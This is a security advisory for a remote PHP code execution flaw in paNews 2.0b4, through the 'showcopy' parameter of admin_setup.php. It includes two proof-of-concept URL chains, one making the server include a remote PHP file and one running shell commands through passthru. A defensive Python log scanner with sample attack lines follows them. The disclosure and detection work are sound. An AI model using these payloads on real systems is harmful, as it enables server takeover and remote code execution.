PANews Remote PHP Script Code Execution Vulnerability
BID:12611
Info
| Bugtraq ID: | 12611 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2005 12:00AM |
| Updated: | Feb 21 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to tjomka <[email protected]> |
| Vulnerable: | PHP Arena paNews 2.0 b4 |
| Not Vulnerable: | |
Discussion
PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script.
Reports indicate that when malicious script code is injected, this code can then be forced to execute in the context of the web service that is hosting the affected software.
This vulnerability is reported to affect PaNews version 2.0b4; other versions might also be affected.
Exploit / POC
The following examples are available:
Example 1
http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://www.example.com/panews/includes/config.php?nst=http://your/file.php
Example 2
http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://www.example.com/panews/includes/config.php?nst=id
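A log check for the two-step request pattern shown in the examples above, as an added example that is not part of the original advisory or of paNews: it flags requests to 'admin_setup.php' whose parameter values contain PHP variable or call syntax, and any request to 'includes/config.php' that carries a query string. The access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic: a settings value should never hold a PHP variable ($name) or a call (name( ).
PHP_CODE = re.compile(r"\$[A-Za-z_]\w*|\b[A-Za-z_]\w*\s*\(")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return a finding label for one access-log line, or None if it looks benign."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decodes values
    path = url.path.lower()
    if path.endswith("/includes/admin_setup.php"):
        bad = sorted({k for k, v in params if PHP_CODE.search(v)})
        if bad:
            return "php-code-in-settings:" + ",".join(bad)
    elif path.endswith("/includes/config.php") and params:
        # A configuration include has no reason to be requested with parameters.
        return "config-requested-with-params:" + ",".join(sorted({k for k, _ in params}))
    return None

# Constructed sample log lines (documentation address range), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2005:10:00:01 +0000] "GET /panews/index.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [21/Feb/2005:10:02:13 +0000] "GET /panews/includes/admin_setup.php'
    '?access[]=admins&do=updatesets&showcopy=passthru%28%24nst%29 HTTP/1.1" 200 312',
    '192.0.2.77 - - [21/Feb/2005:10:02:20 +0000] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 58',
    '192.0.2.10 - - [21/Feb/2005:10:05:44 +0000] "GET /panews/includes/admin_setup.php'
    '?do=updatesets&showcopy=1 HTTP/1.1" 200 290',
]

def scan(lines):
    """Return (line index, label) for every flagged line."""
    return [(i, label) for i, line in enumerate(lines) if (label := classify(line))]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_LOG):
        print(idx, label)
```

The call-syntax pattern is deliberately broad and will also flag harmless values containing a word followed by a parenthesis, so findings on 'admin_setup.php' need review against what the settings form legitimately submits.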
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- paNews Homepage (PHP Arena)
- paNews v2.0b4 - PHP Injection (tjomka)